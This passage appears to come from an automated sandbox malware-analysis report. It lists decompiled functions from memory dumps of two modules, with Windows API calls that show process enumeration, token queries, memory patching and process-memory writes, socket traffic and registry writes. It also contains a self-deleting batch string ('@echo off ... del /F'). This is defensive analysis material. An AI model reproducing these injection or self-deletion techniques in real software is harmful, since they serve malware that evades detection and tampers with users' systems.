Part of subcall function 00C2DE64: LeaveCriticalSection.KERNEL32 ref: 00C2DF65

LeaveCriticalSection.KERNEL32(?,?,00C27854,?,000000FF,00000000), ref: 00C2E1CC

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

GlobalUnlock.KERNEL32 ref: 00C2E1D3

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF06B6, Relevance: 6.1, APIs: 4, Instructions: 59

APIs

RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000104,00000000,?,00000000), ref: 00FF06D4
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000103,00000000,?,?), ref: 00FF0709
RegCloseKey.ADVAPI32(?), ref: 00FF0718
RegCloseKey.ADVAPI32(?), ref: 00FF0733

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FEFBE9, Relevance: 6.1, APIs: 4, Instructions: 57

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,00FEFEB0,?,?,?,?,00000002), ref: 00FEFBF4
GetTickCount.KERNEL32 ref: 00FEFC27
memcpy.MSVCRT ref: 00FEFC60
LeaveCriticalSection.KERNEL32(?,?,?,?,?,00000000,?,00FEFEB0,?,?,?,?,00000002), ref: 00FEFC6C

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C4FBE9, Relevance: 6.1, APIs: 4, Instructions: 57

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,00C4FEB0,?,?,?,?,00000002), ref: 00C4FBF4
GetTickCount.KERNEL32 ref: 00C4FC27
memcpy.MSVCRT ref: 00C4FC60
LeaveCriticalSection.KERNEL32(?,?,?,?,?,00000000,?,00C4FEB0,?,?,?,?,00000002), ref: 00C4FC6C

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCC86A, Relevance: 6.1, APIs: 4, Instructions: 52

APIs

Part of subcall function 00FCF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00FCF82D

DeleteCriticalSection.KERNEL32(?,?,?,?,00FCC856), ref: 00FCC8C2

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

CloseHandle.KERNEL32 ref: 00FCC8DA
DeleteCriticalSection.KERNEL32(?,?,?,?,?,00FCC856), ref: 00FCC8E7
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00FCC856), ref: 00FCC8F0

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2C86A, Relevance: 6.1, APIs: 4, Instructions: 52

APIs

Part of subcall function 00C2F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00C2F82D

DeleteCriticalSection.KERNEL32(?,?,?,?,00C2C856), ref: 00C2C8C2

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

CloseHandle.KERNEL32 ref: 00C2C8DA
DeleteCriticalSection.KERNEL32(?,?,?,?,?,00C2C856), ref: 00C2C8E7
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00C2C856), ref: 00C2C8F0

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2AA04, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

GetTickCount.KERNEL32 ref: 00C2AA11
GetLastInputInfo.USER32(?), ref: 00C2AA24
GetLocalTime.KERNEL32(?), ref: 00C2AA48

Part of subcall function 00C4D979: SystemTimeToFileTime.KERNEL32(?,?), ref: 00C4D983

GetTimeZoneInformation.KERNEL32(?), ref: 00C2AA60

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD2F57, Relevance: 6.0, APIs: 4, Instructions: 39

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,00001CFF), ref: 00FD2F6C
TranslateMessage.USER32(?), ref: 00FD2F90
DispatchMessageW.USER32(?), ref: 00FD2F9B
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD2FAB

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C32F57, Relevance: 6.0, APIs: 4, Instructions: 39

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,00001CFF), ref: 00C32F6C
TranslateMessage.USER32(?), ref: 00C32F90
DispatchMessageW.USER32(?), ref: 00C32F9B
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C32FAB

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FDE1B7, Relevance: 6.0, APIs: 4, Instructions: 38

APIs

Part of subcall function 00FD568C: TlsSetValue.KERNEL32(00000001,00FD638A), ref: 00FD5699

Part of subcall function 00FEBEE3: CreateMutexW.KERNEL32(01002974,00000000,?), ref: 00FEBF05

Part of subcall function 00FE4B8D: WaitForSingleObject.KERNEL32(00000000,00FD63B6), ref: 00FE4B95

GetCurrentThread.KERNEL32 ref: 00FDE1DF
SetThreadPriority.KERNEL32 ref: 00FDE1E6
WaitForSingleObject.KERNEL32(00001388), ref: 00FDE1F8

Part of subcall function 00FF4181: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FF41A1
Part of subcall function 00FF4181: Process32FirstW.KERNEL32(?,?), ref: 00FF41C6
Part of subcall function 00FF4181: OpenProcess.KERNEL32(00000400,00000000,?), ref: 00FF421D
Part of subcall function 00FF4181: CloseHandle.KERNEL32 ref: 00FF423B
Part of subcall function 00FF4181: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 00FF4257
Part of subcall function 00FF4181: memcmp.MSVCRT ref: 00FF426F
Part of subcall function 00FF4181: CloseHandle.KERNEL32(?), ref: 00FF42E7
Part of subcall function 00FF4181: Process32NextW.KERNEL32(?,?), ref: 00FF42F3
Part of subcall function 00FF4181: CloseHandle.KERNEL32 ref: 00FF4306

WaitForSingleObject.KERNEL32(00001388), ref: 00FDE211

Part of subcall function 00FD2FB7: ReleaseMutex.KERNEL32 ref: 00FD2FBB
Part of subcall function 00FD2FB7: CloseHandle.KERNEL32 ref: 00FD2FC2

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3E1B7, Relevance: 6.0, APIs: 4, Instructions: 38

APIs

Part of subcall function 00C3568C: TlsSetValue.KERNEL32(00000001,00C554A7), ref: 00C35699

Part of subcall function 00C4BEE3: CreateMutexW.KERNEL32(00C62974,00000000,?), ref: 00C4BF05

Part of subcall function 00C44B8D: WaitForSingleObject.KERNEL32(00000000,00C554CE), ref: 00C44B95

GetCurrentThread.KERNEL32 ref: 00C3E1DF
SetThreadPriority.KERNEL32 ref: 00C3E1E6
WaitForSingleObject.KERNEL32(00001388), ref: 00C3E1F8

Part of subcall function 00C54181: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C541A1
Part of subcall function 00C54181: Process32FirstW.KERNEL32(?,?), ref: 00C541C6
Part of subcall function 00C54181: OpenProcess.KERNEL32(00000400,00000000,?), ref: 00C5421D
Part of subcall function 00C54181: CloseHandle.KERNEL32 ref: 00C5423B
Part of subcall function 00C54181: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 00C54257
Part of subcall function 00C54181: memcmp.MSVCRT ref: 00C5426F
Part of subcall function 00C54181: CloseHandle.KERNEL32(?), ref: 00C542E7
Part of subcall function 00C54181: Process32NextW.KERNEL32(?,?), ref: 00C542F3
Part of subcall function 00C54181: CloseHandle.KERNEL32 ref: 00C54306

WaitForSingleObject.KERNEL32(00001388), ref: 00C3E211

Part of subcall function 00C32FB7: ReleaseMutex.KERNEL32 ref: 00C32FBB
Part of subcall function 00C32FB7: CloseHandle.KERNEL32 ref: 00C32FC2

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCDE15, Relevance: 6.0, APIs: 4, Instructions: 28

APIs

WaitForSingleObject.KERNEL32(?,00007530), ref: 00FCDE25
EnterCriticalSection.KERNEL32(?,?,00007530), ref: 00FCDE33
LeaveCriticalSection.KERNEL32(?,?,00007530), ref: 00FCDE48
WaitForSingleObject.KERNEL32(?,00007530), ref: 00FCDE52

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3EA5E, Relevance: 6.0, APIs: 4, Instructions: 28

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0001E9A0,00000000), ref: 00C3EA75
WaitForSingleObject.KERNEL32(?,00003A98), ref: 00C3EA87
TerminateThread.KERNEL32(?,00000000), ref: 00C3EA93
CloseHandle.KERNEL32 ref: 00C3EA9A

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2DE15, Relevance: 6.0, APIs: 4, Instructions: 28

APIs

WaitForSingleObject.KERNEL32(?,00007530), ref: 00C2DE25
EnterCriticalSection.KERNEL32(?,?,00007530), ref: 00C2DE33
LeaveCriticalSection.KERNEL32(?,?,00007530), ref: 00C2DE48
WaitForSingleObject.KERNEL32(?,00007530), ref: 00C2DE52

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF13F4, Relevance: 6.0, APIs: 3, Instructions: 50

APIs

getpeername.WS2_32(?,?,?), ref: 00FF1418
getsockname.WS2_32(?,?,?), ref: 00FF1430
send.WS2_32(00000000,?,00000008,00000000), ref: 00FF1461

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C513F4, Relevance: 6.0, APIs: 3, Instructions: 50

APIs

getpeername.WS2_32(?,?,?), ref: 00C51418
getsockname.WS2_32(?,?,?), ref: 00C51430
send.WS2_32(00000000,?,00000008,00000000), ref: 00C51461

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD6C17, Relevance: 6.0, APIs: 3, Instructions: 30

APIs

socket.WS2_32(?,00000001,00000006), ref: 00FD6C23
connect.WS2_32 ref: 00FD6C40
closesocket.WS2_32 ref: 00FD6C4B

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C36C17, Relevance: 6.0, APIs: 3, Instructions: 30

APIs

socket.WS2_32(?,00000001,00000006), ref: 00C36C23
connect.WS2_32 ref: 00C36C40
closesocket.WS2_32 ref: 00C36C4B

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE4CA0, Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 79

APIs

memcpy.MSVCRT ref: 00FE4CC6

Part of subcall function 00FD0243: CryptDestroyKey.ADVAPI32 ref: 00FD025A
Part of subcall function 00FD0243: CryptImportKey.ADVAPI32(?,?,00000114,00000000,00000000), ref: 00FD0278

memset.MSVCRT ref: 00FE4D69

Part of subcall function 00FD028F: CryptGetKeyParam.ADVAPI32(?,00000009,?,?,00000000), ref: 00FD02B0

Part of subcall function 00FC9A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00FC9ACA
Part of subcall function 00FC9A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00FC9AEF

Part of subcall function 00FD02CE: CryptVerifySignatureW.ADVAPI32(?,?,?,?,00000000,00000000,?,?,00000114,?,00FE4D47), ref: 00FD031F

Part of subcall function 00FD0223: CryptDestroyKey.ADVAPI32 ref: 00FD0235

Strings

\26}, xrefs: 00FE4CBE

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C44CA0, Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 79

APIs

memcpy.MSVCRT ref: 00C44CC6

Part of subcall function 00C30243: CryptDestroyKey.ADVAPI32 ref: 00C3025A
Part of subcall function 00C30243: CryptImportKey.ADVAPI32(?,?,00000114,00000000,00000000), ref: 00C30278

memset.MSVCRT ref: 00C44D69

Part of subcall function 00C3028F: CryptGetKeyParam.ADVAPI32(?,00000009,?,?,00000000), ref: 00C302B0

Part of subcall function 00C29A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00C29ACA
Part of subcall function 00C29A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00C29AEF

Part of subcall function 00C302CE: CryptVerifySignatureW.ADVAPI32(?,?,?,?,00000000,00000000,?,?,00000114,?,00C44D47), ref: 00C3031F

Part of subcall function 00C30223: CryptDestroyKey.ADVAPI32 ref: 00C30235

Strings

\26}, xrefs: 00C44CBE

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4BE5A, Relevance: 5.8, APIs: 3, Instructions: 36

APIs

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

Part of subcall function 00C4BAD3: memcpy.MSVCRT ref: 00C4BAEE
Part of subcall function 00C4BAD3: StringFromGUID2.OLE32(?), ref: 00C4BB92

CreateMutexW.KERNEL32(00C62974,00000001,?), ref: 00C4BEA0
GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 00C4BEAC
CloseHandle.KERNEL32 ref: 00C4BEBA

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF2917, Relevance: 5.8, APIs: 3, Instructions: 30

APIs

WSACreateEvent.WS2_32(00000000,?,00FF2C15,?,00000000,?,00FF2CD1,?,?,?,?,00000000), ref: 00FF292D
WSAEventSelect.WS2_32(?,?,00FF2CD1), ref: 00FF2943
WSACloseEvent.WS2_32(?), ref: 00FF2957

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C52917, Relevance: 5.8, APIs: 3, Instructions: 30

APIs

WSACreateEvent.WS2_32(00000000,?,00C52C15,?,00000000,?,00C52CD1,?,?,?,?,00000000), ref: 00C5292D
WSAEventSelect.WS2_32(?,?,00C52CD1), ref: 00C52943
WSACloseEvent.WS2_32(?), ref: 00C52957

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FEC3E0, Relevance: 5.7, APIs: 3, Instructions: 40

APIs

lstrlenW.KERNEL32(00FC7C5C), ref: 00FEC3FC
lstrlenW.KERNEL32(?), ref: 00FEC402

Part of subcall function 00FD6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00FECB50,?,00000000,00000001,00000001,00FECB1A,?,00FD54E4,?,@echo off%sdel /F "%s",?,?), ref: 00FD6A43
Part of subcall function 00FD6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00FECB50,?,00000000,00000001,00000001,00FECB1A,?,00FD54E4,?,@echo off%sdel /F "%s",?), ref: 00FD6A56

memcpy.MSVCRT ref: 00FEC426

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C4C3E0, Relevance: 5.7, APIs: 3, Instructions: 40

APIs

lstrlenW.KERNEL32(00C27C5C), ref: 00C4C3FC
lstrlenW.KERNEL32(?), ref: 00C4C402

Part of subcall function 00C36A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?,?), ref: 00C36A43
Part of subcall function 00C36A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?), ref: 00C36A56

memcpy.MSVCRT ref: 00C4C426

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE65F4, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 138

APIs

Part of subcall function 00FE65A9: StrCmpNIA.SHLWAPI ref: 00FE65C0

StrCmpNIA.SHLWAPI(?,nbsp;,00000005), ref: 00FE675C

Strings

script, xrefs: 00FE6669 00FE6693
nbsp;, xrefs: 00FE6754

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C465F4, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 138

APIs

Part of subcall function 00C465A9: StrCmpNIA.SHLWAPI ref: 00C465C0

StrCmpNIA.SHLWAPI(?,nbsp;,00000005), ref: 00C4675C

Strings

script, xrefs: 00C46669 00C46693
nbsp;, xrefs: 00C46754

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD7058, Relevance: 5.7, APIs: 3, Instructions: 82

APIs

Part of subcall function 00FDDCF8: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00FDDD10
Part of subcall function 00FDDCF8: CreateFileMappingW.KERNEL32(?,00000000,00000008,00000000,00000000,00000000), ref: 00FDDD24
Part of subcall function 00FDDCF8: CloseHandle.KERNEL32 ref: 00FDDD37

GetFileSizeEx.KERNEL32(00000000,?), ref: 00FD708F

Part of subcall function 00FDDD44: UnmapViewOfFile.KERNEL32 ref: 00FDDD50
Part of subcall function 00FDDD44: MapViewOfFile.KERNEL32(?,00000001,00000000,00000000,00000000), ref: 00FDDD67

Part of subcall function 00FCE524: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,?), ref: 00FCE534

SetEndOfFile.KERNEL32 ref: 00FD7105
FlushFileBuffers.KERNEL32(?), ref: 00FD7110

Part of subcall function 00FCE348: CloseHandle.KERNEL32 ref: 00FCE354

Part of subcall function 00FCE56C: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00FCE594

Part of subcall function 00FD6F3F: GetFileAttributesW.KERNEL32(?), ref: 00FD6F50
Part of subcall function 00FD6F3F: PathRemoveFileSpecW.SHLWAPI(?), ref: 00FD6F85
Part of subcall function 00FD6F3F: MoveFileExW.KERNEL32(?,?,00000001), ref: 00FD6FCC
Part of subcall function 00FD6F3F: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00FD6FE5
Part of subcall function 00FD6F3F: Sleep.KERNEL32(00001388), ref: 00FD7028
Part of subcall function 00FD6F3F: FlushFileBuffers.KERNEL32 ref: 00FD7036

Part of subcall function 00FDDCB8: UnmapViewOfFile.KERNEL32 ref: 00FDDCC4
Part of subcall function 00FDDCB8: CloseHandle.KERNEL32 ref: 00FDDCD7
Part of subcall function 00FDDCB8: CloseHandle.KERNEL32 ref: 00FDDCED

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FD6B66, Relevance: 5.7, APIs: 2, Instructions: 57

APIs

select.WS2_32(00000000,?,00000000,00000000), ref: 00FD6BC5
recv.WS2_32(?,?,?,00000000), ref: 00FD6BD5

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C36B66, Relevance: 5.7, APIs: 2, Instructions: 57

APIs

select.WS2_32(00000000,?,00000000,00000000), ref: 00C36BC5
recv.WS2_32(?,?,?,00000000), ref: 00C36BD5

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD072F, Relevance: 5.7, APIs: 3, Instructions: 56

APIs

GetCurrentThreadId.KERNEL32 ref: 00FD0730
VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 00FD0767

Part of subcall function 00FD0643: memset.MSVCRT ref: 00FD0654

Part of subcall function 00FD03FD: GetCurrentProcess.KERNEL32 ref: 00FD0400
Part of subcall function 00FD03FD: VirtualProtect.KERNEL32(6FFF0000,00010000,00000020,?), ref: 00FD0421
Part of subcall function 00FD03FD: FlushInstructionCache.KERNEL32(?,6FFF0000,00010000), ref: 00FD042A

ResumeThread.KERNEL32(?), ref: 00FD07A8

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3072F, Relevance: 5.7, APIs: 3, Instructions: 56

APIs

GetCurrentThreadId.KERNEL32 ref: 00C30730
VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 00C30767

Part of subcall function 00C30643: memset.MSVCRT ref: 00C30654

Part of subcall function 00C303FD: GetCurrentProcess.KERNEL32 ref: 00C30400
Part of subcall function 00C303FD: VirtualProtect.KERNEL32(00000000,00010000,00000020,?), ref: 00C30421
Part of subcall function 00C303FD: FlushInstructionCache.KERNEL32(?,00000000,00010000), ref: 00C3042A

ResumeThread.KERNEL32(?), ref: 00C307A8

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FED7AE, Relevance: 5.6, APIs: 3, Instructions: 47

APIs

CloseHandle.KERNEL32(?), ref: 00FED7BF

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

InternetQueryOptionA.WININET(?,00000015,?,?), ref: 00FED7FF
InternetCloseHandle.WININET(?), ref: 00FED80A

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C4D7AE, Relevance: 5.6, APIs: 3, Instructions: 47

APIs

CloseHandle.KERNEL32(?), ref: 00C4D7BF

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

InternetQueryOptionA.WININET(?,00000015,?,?), ref: 00C4D7FF
InternetCloseHandle.WININET(?), ref: 00C4D80A

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C445AE, Relevance: 5.6, APIs: 3, Instructions: 44

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00C445D1
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C445E9
DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000001), ref: 00C44604

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF3629, Relevance: 5.6, APIs: 3, Instructions: 43

APIs

GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 00FF363C
GetLastError.KERNEL32(?,00FD5032,?,00000008,?,?,?,?,?,?,00FE49E1,?,?,00000001), ref: 00FF3646

Part of subcall function 00FD69B0: HeapAlloc.KERNEL32(00000008,?,?,00FD519B,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD69C1

GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 00FF366E

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C53629, Relevance: 5.6, APIs: 3, Instructions: 43

APIs

GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 00C5363C
GetLastError.KERNEL32(?,00C35032,?,00000008,?,?,?,?,?,?,00C449E1,?,?,00000001), ref: 00C53646

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 00C5366E

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD500E, Relevance: 5.6, APIs: 3, Instructions: 41

APIs

OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00FD5020

Part of subcall function 00FF3629: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 00FF363C
Part of subcall function 00FF3629: GetLastError.KERNEL32(?,00FD5032,?,00000008,?,?,?,?,?,?,00FE49E1,?,?,00000001), ref: 00FF3646
Part of subcall function 00FF3629: GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 00FF366E

GetTokenInformation.ADVAPI32(?,0000000C,01002968,00000004,?), ref: 00FD5048

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

CloseHandle.KERNEL32(?), ref: 00FD505E

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3500E, Relevance: 5.6, APIs: 3, Instructions: 41

APIs

OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00C35020

Part of subcall function 00C53629: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 00C5363C
Part of subcall function 00C53629: GetLastError.KERNEL32(?,00C35032,?,00000008,?,?,?,?,?,?,00C449E1,?,?,00000001), ref: 00C53646
Part of subcall function 00C53629: GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 00C5366E

GetTokenInformation.ADVAPI32(?,0000000C,00C62968,00000004,?), ref: 00C35048

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

CloseHandle.KERNEL32(?), ref: 00C3505E

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD6EFA, Relevance: 5.6, APIs: 3, Instructions: 34

APIs

socket.WS2_32(?,00000002,00000011), ref: 00FD6F09
bind.WS2_32 ref: 00FD6F25
closesocket.WS2_32 ref: 00FD6F30

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C36EFA, Relevance: 5.6, APIs: 3, Instructions: 34

APIs

socket.WS2_32(?,00000002,00000011), ref: 00C36F09
bind.WS2_32 ref: 00C36F25
closesocket.WS2_32 ref: 00C36F30

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C303FD, Relevance: 5.6, APIs: 3, Instructions: 28

APIs

GetCurrentProcess.KERNEL32 ref: 00C30400
VirtualProtect.KERNEL32(00000000,00010000,00000020,?), ref: 00C30421
FlushInstructionCache.KERNEL32(?,00000000,00010000), ref: 00C3042A

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCF825, Relevance: 5.6, APIs: 1, Instructions: 19

APIs

InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00FCF82D

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2F825, Relevance: 5.6, APIs: 1, Instructions: 19

APIs

InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00C2F82D

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF2968, Relevance: 5.6, APIs: 3, Instructions: 17

APIs

shutdown.WS2_32(?,00000002), ref: 00FF2976
closesocket.WS2_32(?), ref: 00FF297F
WSACloseEvent.WS2_32(?), ref: 00FF2992

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C52968, Relevance: 5.6, APIs: 3, Instructions: 17

APIs

shutdown.WS2_32(?,00000002), ref: 00C52976
closesocket.WS2_32(?), ref: 00C5297F
WSACloseEvent.WS2_32(?), ref: 00C52992

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FDE22A, Relevance: 5.6, APIs: 3, Instructions: 16

APIs

PathFindFileNameW.SHLWAPI(?), ref: 00FDE22E
PathRemoveExtensionW.SHLWAPI(?), ref: 00FDE242
CharUpperW.USER32(?,?,?,00FDE32B), ref: 00FDE24C

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3E22A, Relevance: 5.6, APIs: 3, Instructions: 16

APIs

PathFindFileNameW.SHLWAPI(?), ref: 00C3E22E
PathRemoveExtensionW.SHLWAPI(?), ref: 00C3E242
CharUpperW.USER32(?,?,?,00C3E32B), ref: 00C3E24C

Memory Dump Source

